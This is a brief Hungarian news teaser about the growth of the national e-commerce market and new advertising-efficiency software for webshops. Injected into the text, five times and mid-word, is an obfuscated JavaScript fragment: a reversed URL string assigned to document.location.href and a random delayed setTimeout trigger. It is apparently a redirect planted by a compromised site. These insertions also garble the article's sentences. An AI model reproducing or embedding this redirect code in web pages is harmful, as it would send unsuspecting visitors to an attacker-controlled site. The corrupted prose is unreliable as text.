Minden eddiginél dinamikusabban növekszik a hazai e-kereskedelmi piac. 2019-ben 17%-os növekedés mellett 781 milliárd forintoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos forgalmat ért el, amely 2020-ban 950 milliárd forintra emelkedett. Az évek óta folyamatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosan felívelő tendenciának toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}további lökést adott a koronavírus-járvány, hiszen jelentős tömegek tértek át a készpénz- és érintés nélküli vásárlásra. Az online térben megjelenő vásárlói igényekre reagálva az e-kereskedelmi piac szereplőinek száma és a szektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor kommunikációs, hirdetési intenzitása is ugrásszerűen megnőtt. A vásárlói szokások megváltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozása lehetőséget, míg a versenytársi környezet fejlődése kihívásokat állít az egyes szereplők elé. Nem véletlen, hogy az online kereskedelmi stratégiák fókuszában az egyre nagyobb hirdetési költések hatékonyságának növelése, a gyakran…
A cikk folytatódik: http://itmozaik.co.hu/tech/2021/04/08/magyar-fejlesztesu-intelligens-szoftver-segitheti-a-hazai-webaruhazakat.html
- Hirdetés -